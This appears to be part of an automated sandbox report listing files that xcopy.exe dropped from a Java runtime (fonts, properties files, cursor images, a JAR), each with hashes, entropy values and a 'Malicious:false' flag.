                                                                                                                                                                                                                                  SHA-256:B2AB990DF3C4C1C2EC4317AAF22C946DF17F0796727DBDA712402307C56558AC
                                                                                                                                                                                                                                  SHA-512:287B19B6996A189BAA3CF2894A57917B14B0615D551C5248AD55860678E5D6E58DD21247799BEBE91B8236FC2F5300399FCFC1BB159EDB9AE8D663805C6A30F1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10578
                                                                                                                                                                                                                                  Entropy (8bit):5.1846955343833105
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:r+e6a1nsNi8bTeOiO/Ywca9nB2RwhCdvBQGuo6wj:rlnHIR9B2Rwhifj
                                                                                                                                                                                                                                  MD5:77CD430A6D793B50B4501EDC37A1E533
                                                                                                                                                                                                                                  SHA1:D18014CC830FA07C6DBB7D8B6EDBDB4178B9D241
                                                                                                                                                                                                                                  SHA-256:2C5837CA86D000A8621275540D1380880852CF6DE2CFD7496418741B7E88BDF9
                                                                                                                                                                                                                                  SHA-512:705BD76336D20D0C5C30266CBCD8FC91CF0FF1901BDCB682119174173F765BCC50291676664071619AC7AF521A8D1C137F78EFAF065AFBE4A6BF413F9F604401
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# .# Copyright (c) 2003, 2018, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#..# Version..version=1..# Component Font Mappings..allfonts.chinese-ms936=SimSun.allfonts.chinese-ms936-extb=SimSun-ExtB.allfonts.chinese-gb18030=SimSun-18030.allfonts.chinese-gb18030-extb=SimSun-ExtB.allfonts.chinese-hkscs=MingLiU_HKSCS.allfonts.chinese-ms950-extb=MingLiU-ExtB.allfonts.devanagari=Mangal.allfonts.dingbats=Wingdings.allfonts.lucida=Lucida Sans Regular.allfonts.symbol=Symbol.allfonts.symbols=Segoe UI Symbol.allfonts.thai=Lucida Sans Regular.allfonts.georgian=Sylfaen..serif.plain.alphabetic=Times New Roman.serif.plain.chinese-ms950=MingLiU.serif.plain.chinese-ms950-extb=MingLiU-ExtB.serif.plain.hebrew=David.serif.plain.japanese=MS Mincho.serif.plain.korean=Batang..serif.bold.alphabetic=Times New Roman Bold.serif.bold.chinese-ms950=PMingLiU.serif.bold.chinese-ms950-extb=PMingLiU-ExtB
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,422.Lucida BrightDemiboldLucida Bright Dem
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):75144
                                                                                                                                                                                                                                  Entropy (8bit):6.849420541001734
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:H8Jwt1GIlZ6l0/9tRWhc0x/YxvsTjyIDXCrGU/tlDaKAgKrTLznvzDJIZmjFA0zG:Mwtze9xQcQ/LDaKAgK3LLvzFogbFt5WD
                                                                                                                                                                                                                                  MD5:AF0C5C24EF340AEA5CCAC002177E5C09
                                                                                                                                                                                                                                  SHA1:B5C97F985639E19A3B712193EE48B55DDA581FD1
                                                                                                                                                                                                                                  SHA-256:72CEE3E6DF72AD577AF49C59DCA2D0541060F95A881845950595E5614C486244
                                                                                                                                                                                                                                  SHA-512:6CE87441E223543394B7242AC0CB63505888B503EC071BBF7DB857B5C935B855719B818090305E17C1197DE882CCC90612FB1E0A0E5D2731F264C663EB8DA3F9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc.Lucida BrightDemibold ItalicLucida Bright Demibold Itali
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):75124
                                                                                                                                                                                                                                  Entropy (8bit):6.805969666701276
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:lww80sTGzcKHwxWL0T+qHi/sbA06PoNORsr5sOnD0OyuusGa7bs4J:lwL0i97WL0T+qHA9cOR05FD0Oyup74w
                                                                                                                                                                                                                                  MD5:793AE1AB32085C8DE36541BB6B30DA7C
                                                                                                                                                                                                                                  SHA1:1FD1F757FEBF3E5F5FBB7FBF7A56587A40D57DE7
                                                                                                                                                                                                                                  SHA-256:895C5262CDB6297C13725515F849ED70609DBD7C49974A382E8BBFE4A3D75F8C
                                                                                                                                                                                                                                  SHA-512:A92ADDD0163F6D81C3AEABD63FF5C293E71A323F4AEDFB404F6F1CDE7F84C2A995A30DFEC84A9CAF8FFAF8E274EDD0D7822E6AABB2B0608696A360CABFC866C6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,773.Lucida BrightItalicLucida Bright Itali
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):80856
                                                                                                                                                                                                                                  Entropy (8bit):6.821405620058844
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:jw9ESkPFybxWj1V7zbPUoOPjp85rFqXpLboVklDNTc2Wt:jwZO0xWPTU7l85rFYpLbott
                                                                                                                                                                                                                                  MD5:4D666869C97CDB9E1381A393FFE50A3A
                                                                                                                                                                                                                                  SHA1:AA5C037865C563726ECD63D61CA26443589BE425
                                                                                                                                                                                                                                  SHA-256:D68819A70B60FF68CA945EF5AD358C31829E43EC25024A99D17174C626575E06
                                                                                                                                                                                                                                  SHA-512:1D1F61E371E4A667C90C2CE315024AE6168E47FE8A5C02244DBF3DF26E8AC79F2355AC7E36D4A81D82C52149197892DAED1B4C19241575256BB4541F8B126AE2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,421.Lucida BrightRegularLucida Bright Regu
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):344908
                                                                                                                                                                                                                                  Entropy (8bit):6.939775499317555
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:oBfQeUG2CCTufrmOufymM8hvFHp277tS9iZFYSATxNm:oNQ3vCCTcaFNJw7tSgYS82
                                                                                                                                                                                                                                  MD5:630A6FA16C414F3DE6110E46717AAD53
                                                                                                                                                                                                                                  SHA1:5D7ED564791C900A8786936930BA99385653139C
                                                                                                                                                                                                                                  SHA-256:0FAAACA3C730857D3E50FBA1BBAD4CA2330ADD217B35E22B7E67F02809FAC923
                                                                                                                                                                                                                                  SHA-512:0B7CDE0FACE982B5867AEBFB92918404ADAC7FB351A9D47DCD9FE86C441CACA4DD4EC22E36B61025092220C0A8730D292DA31E9CAFD7808C56CDBF34ECD05035
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:TrueType Font data, 15 tables, 1st "LTSH", 19 names, Macintosh, Copyright (c) 1999, 2001 by Bigelow & Holmes Inc. Pat. Des. 289,420.Lucida SansDemiboldLucida Sa
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):317896
                                                                                                                                                                                                                                  Entropy (8bit):6.869598480468745
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:R5OO1ZjNDE7/MsTJ30otegK4zJwz3UhG5jXsrg2HLzYv7cf0R7o7+WX/ov2DG:bOO11CEo9xzJwljXsrhHQ7cMuX/16
                                                                                                                                                                                                                                  MD5:5DD099908B722236AA0C0047C56E5AF2
                                                                                                                                                                                                                                  SHA1:92B79FEFC35E96190250C602A8FED85276B32A95
                                                                                                                                                                                                                                  SHA-256:53773357D739F89BC10087AB2A829BA057649784A9ACBFFEE18A488B2DCCB9EE
                                                                                                                                                                                                                                  SHA-512:440534EB2076004BEA66CF9AC2CE2B37C10FBF5CC5E0DD8B8A8EDEA25E3613CE8A59FFCB2500F60528BBF871FF37F1D0A3C60396BC740CCDB4324177C38BE97A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:TrueType Font data, 18 tables, 1st "GDEF", 19 names, Macintosh, Copyright (c) 1999 by Bigelow & Holmes Inc. Pat. Des. 289,420.Lucida SansRegularLucida Sans Regu
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):698236
                                                                                                                                                                                                                                  Entropy (8bit):6.892888039120645
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:6obn11t7t7DxT+3+OQ64cctiOAq12ZX/DmfT6R83Sd8uvx7wSnyER4ky+SH/KPKQ:6oTJZzHniOAZ783Sd8uvx7wSnyER4kyI
                                                                                                                                                                                                                                  MD5:B75309B925371B38997DF1B25C1EA508
                                                                                                                                                                                                                                  SHA1:39CC8BCB8D4A71D4657FC92EF0B9F4E3E9E67ADD
                                                                                                                                                                                                                                  SHA-256:F8D877B0B64600E736DFE436753E8E11ACB022E59B5D7723D7D221D81DC2FCDE
                                                                                                                                                                                                                                  SHA-512:9C792EF3116833C90103F27CFD26A175AB1EB11286959F77062893A2E15DE44D79B27E5C47694CBBA734CC05A9A5BEFA72E991C7D60EAB1495AAC14C5CAD901D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:TrueType Font data, 13 tables, 1st "OS/2", 16 names, Macintosh, Copyright (c) 1999, 2001 by Bigelow & Holmes Inc.Lucida Sans TypewriterBoldLucida Sans Typewrite
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):234068
                                                                                                                                                                                                                                  Entropy (8bit):6.901545053424004
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:3BPS7w5KIMtYwqcO3GbA4MJcs2ME9UGQ2n9gM/oD:xVMtgcGGPMJcs4b9gM/4
                                                                                                                                                                                                                                  MD5:A0C96AA334F1AEAA799773DB3E6CBA9C
                                                                                                                                                                                                                                  SHA1:A5DA2EB49448F461470387C939F0E69119310E0B
                                                                                                                                                                                                                                  SHA-256:FC908259013B90F1CBC597A510C6DD7855BF9E7830ABE3FC3612AB4092EDCDE2
                                                                                                                                                                                                                                  SHA-512:A43CF773A42B4CEBF4170A6C94060EA2602D2D7FA7F6500F69758A20DC5CC3ED1793C7CEB9B44CE8640721CA919D2EF7F9568C5AF58BA6E3CF88EAE19A95E796
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:TrueType Font data, 13 tables, 1st "OS/2", 16 names, Macintosh, Copyright (c) 1999 by Bigelow & Holmes Inc.Lucida Sans TypewriterRegularLucida Sans Typewriter R
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):242700
                                                                                                                                                                                                                                  Entropy (8bit):6.936925430880877
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:VwzZsJcCrn271g+UGFDUnrrHqMyBtlc3+fzx5R1zeqZdDgfSkecUfEDpEXzSyPMx:GWcCrn2C46Ak+naqaucYEDpEX3gZoO9
                                                                                                                                                                                                                                  MD5:C1397E8D6E6ABCD727C71FCA2132E218
                                                                                                                                                                                                                                  SHA1:C144DCAFE4FAF2E79CFD74D8134A631F30234DB1
                                                                                                                                                                                                                                  SHA-256:D9D0AAB0354C3856DF81AFAC49BDC586E930A77428CB499007DDE99ED31152FF
                                                                                                                                                                                                                                  SHA-512:DA70826793C7023E61F272D37E2CC2983449F26926746605C550E9D614ACBF618F73D03D0C6351B9537703B05007CD822E42E6DC74423CB5CC736B31458D33B1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13962
                                                                                                                                                                                                                                  Entropy (8bit):3.4283479014478493
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:RgZass+YXdGOS8NhN9Yd9Yq67IwOYUuUS9O0:RyJO/BFi9YqAInYUuUmO0
                                                                                                                                                                                                                                  MD5:1EDDFB1EE252055556F40CDC79632E98
                                                                                                                                                                                                                                  SHA1:84AA425100740722E91F4725CAF849E7863D12BA
                                                                                                                                                                                                                                  SHA-256:69BECFE0D45B62BBDBCF6FE111A8A3A041FB749B6CF38E8A2F670607E17C9EE2
                                                                                                                                                                                                                                  SHA-512:A0FDBF42FF105C9A2F12179124606A720DF8F32365605644E15600767E5732312777A58390FDB1A9B1C0B152CCC29496133B278A6E5736B38AF2B5FAB251D40C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Copyright (c) 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.# This properties file defines a Hijrah calendar variant..#.# Fields:.#.# <version> ::= 'version' '=' <version string>.# <id> ::= 'id' '=' <id string>.# <type> ::= 'type' '=' <type string>.# <iso-start> ::= 'iso-start' '=' <start date in the ISO calendar>.# <year> ::= <yyyy> '=' <nn nn nn nn nn nn nn nn nn nn nn nn>.#.# version ... (Required).#.# id ... (Required).# Identifies the Java Chronology.#.# type ... (Required).# Identifies the type of calendar in the standard calendar ID scheme.# iso-start ... (Required).# Specifies the corresponding ISO date to the first Hijrah day.# in the defined range of dates.#.# year ... (Required).# Number of days for each month of a Hijrah year.# * Each line defines a year. The years must be in chronological.#
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):623
                                                                                                                                                                                                                                  Entropy (8bit):4.956046853743128
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:QcwmIzDhHlB725iwoXH3ExOvadDfI3xizh49g1n8OEDfI7yO7:QhDBfOoXHjifIBMB1XqfI77
                                                                                                                                                                                                                                  MD5:9AEF14A90600CD453C4E472BA83C441F
                                                                                                                                                                                                                                  SHA1:10C53C9FE9970D41A84CB45C883EA6C386482199
                                                                                                                                                                                                                                  SHA-256:9E86B24FF2B19D814BBAEDD92DF9F0E1AE86BF11A86A92989C9F91F959B736E1
                                                                                                                                                                                                                                  SHA-512:481562547BF9E37D270D9A2881AC9C86FC8F928B5C176E9BAF6B8F7B72FB9827C84EF0C84B60894656A6E82DD141779B8D283C6E7A0E85D2829EA071C6DB7D14
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Copyright (c) 2001, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.# List of JVMs that can be used as an option to java, javac, etc..# Order is important -- first in this list is the default JVM..# NOTE that this both this file and its format are UNSUPPORTED and.# WILL GO AWAY in a future release..#.# You may also select a JVM in an arbitrary location with the.# "-XXaltjvm=<jvm_dir>" option, but that too is unsupported.# and may not be available in a future release..#.-client KNOWN.-server KNOWN.
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1280
                                                                                                                                                                                                                                  Entropy (8bit):4.9763389414972465
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:RlwQtG0Bf29d3ptAMZGpfFGZWpHN07mBpQKf4TpxV4jp504Tz8pFMafpXs:RlwQM0BfEpZSKyCycXW44Cfy
                                                                                                                                                                                                                                  MD5:269D03935907969C3F11D43FEF252EF1
                                                                                                                                                                                                                                  SHA1:713ACB9EFF5F0B14A109E6C2771F62EAC9B57D7C
                                                                                                                                                                                                                                  SHA-256:7B8B63F78E2F732BD58BF8F16144C4802C513A52970C18DC0BDB789DD04078E4
                                                                                                                                                                                                                                  SHA-512:94D8EE79847CD07681645D379FEEF6A4005F1836AC00453FB685422D58113F641E60053F611802B0FF8F595B2186B824675A91BF3E68D336EF5BD72FAFB2DCC5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.#.# Cursors Properties file.#.# Names GIF89 sources for Custom Cursors and their associated HotSpots.#.# Note: the syntax of the property name is significant and is parsed.# by java.awt.Cursor.#.# The syntax is: Cursor.<name>.<geom>.File=win32_<filename>.# Cursor.<name>.<geom>.HotSpot=<x>,<y>.#. Cursor.<name>.<geom>.Name=<localized name>.#.Cursor.CopyDrop.32x32.File=win32_CopyDrop32x32.gif.Cursor.CopyDrop.32x32.HotSpot=0,0.Cursor.CopyDrop.32x32.Name=CopyDrop32x32.#.Cursor.MoveDrop.32x32.File=win32_MoveDrop32x32.gif.Cursor.MoveDrop.32x32.HotSpot=0,0.Cursor.MoveDrop.32x32.Name=MoveDrop32x32.#.Cursor.LinkDrop.32x32.File=win32_LinkDrop32x32.gif.Cursor.LinkDrop.32x32.HotSpot=0,0.Cursor.LinkDrop.32x32.Name=LinkDrop32x32.#.Cursor.CopyNoDrop.32x32.File=win32_CopyNoDrop32x32.gif.Cursor.CopyNoDrop.32x32.HotSpot=6,2.Cursor.CopyNoDrop.32x32.Name=CopyNoDrop32x32.#.Cursor.MoveNoDrop.32x32.File=win32_MoveNoDrop32x32.gif.Cursor.MoveNoDrop.32x32.HotSpot=6,2.Cursor.MoveNoDrop.32
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):153
                                                                                                                                                                                                                                  Entropy (8bit):6.2813106319833665
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                                                                                                                                                                                                                  MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                                                                                                                                                                                                                  SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                                                                                                                                                                                                                  SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                                                                                                                                                                                                                  SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 31 x 32
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):165
                                                                                                                                                                                                                                  Entropy (8bit):6.347455736310776
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:CruuU/XExlHrBwM7Qt/wCvTjh2Azr8ptBNKtWwUzJ7Ful5u44JyYChWn:KP0URwMcx3UAzADBNwUlBul5TLYMWn
                                                                                                                                                                                                                                  MD5:89CDF623E11AAF0407328FD3ADA32C07
                                                                                                                                                                                                                                  SHA1:AE813939F9A52E7B59927F531CE8757636FF8082
                                                                                                                                                                                                                                  SHA-256:13C783ACD580DF27207DABCCB10B3F0C14674560A23943AC7233DF7F72D4E49D
                                                                                                                                                                                                                                  SHA-512:2A35311D7DB5466697D7284DE75BABEE9BD0F0E2B20543332FCB6813F06DEBF2457A9C0CF569449C37F371BFEB0D81FB0D219E82B9A77ACC6BAFA07499EAC2F7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):153
                                                                                                                                                                                                                                  Entropy (8bit):6.2813106319833665
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                                                                                                                                                                                                                  MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                                                                                                                                                                                                                  SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                                                                                                                                                                                                                  SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                                                                                                                                                                                                                  SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 31 x 32
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):168
                                                                                                                                                                                                                                  Entropy (8bit):6.465243369905675
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:CruuU/XExlHrZauowM7Qt/wCvTjh2Azr8ptBNKtWwUzJZmQYRNbC1MIQvEn:KP0UpawMcx3UAzADBNwUlZaCzn
                                                                                                                                                                                                                                  MD5:694A59EFDE0648F49FA448A46C4D8948
                                                                                                                                                                                                                                  SHA1:4B3843CBD4F112A90D112A37957684C843D68E83
                                                                                                                                                                                                                                  SHA-256:485CBE5C5144CFCD13CC6D701CDAB96E4A6F8660CBC70A0A58F1B7916BE64198
                                                                                                                                                                                                                                  SHA-512:CF2DFD500AF64B63CC080151BC5B9DE59EDB99F0E31676056CF1AFBC9D6E2E5AF18DC40E393E043BBBBCB26F42D425AF71CCE6D283E838E67E61D826ED6ECD27
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):153
                                                                                                                                                                                                                                  Entropy (8bit):6.2813106319833665
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                                                                                                                                                                                                                  MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                                                                                                                                                                                                                  SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                                                                                                                                                                                                                  SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                                                                                                                                                                                                                  SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 31 x 32
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):147
                                                                                                                                                                                                                                  Entropy (8bit):6.147949937659802
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:CruuU/XExlHrSauZKwM7Qt/wCvTjh2Azr8ptBNKtWXOh6WoXt2W:KP0UvEKwMcx3UAzADBNXOh6h9p
                                                                                                                                                                                                                                  MD5:CC8DD9AB7DDF6EFA2F3B8BCFA31115C0
                                                                                                                                                                                                                                  SHA1:1333F489AC0506D7DC98656A515FEEB6E87E27F9
                                                                                                                                                                                                                                  SHA-256:12CFCE05229DBA939CE13375D65CA7D303CE87851AE15539C02F11D1DC824338
                                                                                                                                                                                                                                  SHA-512:9857B329ACD0DB45EA8C16E945B4CFA6DF9445A1EF457E4B8B40740720E8C658301FC3AB8BDD242B7697A65AE1436FD444F1968BD29DA6A89725CDDE1DE387B8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):153
                                                                                                                                                                                                                                  Entropy (8bit):6.2813106319833665
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                                                                                                                                                                                                                  MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                                                                                                                                                                                                                  SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                                                                                                                                                                                                                  SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                                                                                                                                                                                                                  SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):56
                                                                                                                                                                                                                                  Entropy (8bit):4.46299398428717
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:CEBqRM9LTAGQdLVrKmqRM9LHQIuHI:CEAsnAbLZKrszQi
                                                                                                                                                                                                                                  MD5:BEA65F7B8645C5FB1C3E8C980F1F955C
                                                                                                                                                                                                                                  SHA1:9FEC7A11BB6341C7CC81C80FAC8204BC4276710B
                                                                                                                                                                                                                                  SHA-256:F74D4CC6A7F5DC7F5821D8A6D0D5D7ABA345A1E9AE8FD3EA2323F40F02B05330
                                                                                                                                                                                                                                  SHA-512:5C294A24B0DDE6F472BBC52DDE084AC3D0FA60080BBBC075312B951A6B3CB703DE3D5164169542C605C1913971D123F1E3A74B3640114BABB182DF570217412C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:javafx.runtime.version=8.0.381.javafx.runtime.build=b09.
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):956923
                                                                                                                                                                                                                                  Entropy (8bit):5.933997747475344
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:9D3KFhiwi2aA0yAaLwLbrJIVR4902ikOln27yrZM85G/1pCRZvLYrrorubXFM8/V:YFJ0yKb9a2LtVoiY0Dh
                                                                                                                                                                                                                                  MD5:29769612ADAFBA5029AF1F5A56A49FE1
                                                                                                                                                                                                                                  SHA1:959D03E5621BD9FDF276F24E0319EAB548207FBD
                                                                                                                                                                                                                                  SHA-256:A30389DA600A79FDFA1017132EF1317F005BD0F91160542C902873D99447283F
                                                                                                                                                                                                                                  SHA-512:321EFB4CB2D51DFE06F8D9A0E000EBCC8111DC7A95235587F2D87695AD3CF09EE27E3836C6BF2F335F1D0B30F788C4AC2F6AAB4F676CD48177222A74825DBCD2
                                                                                                                                                                                                                                  Malicious:false
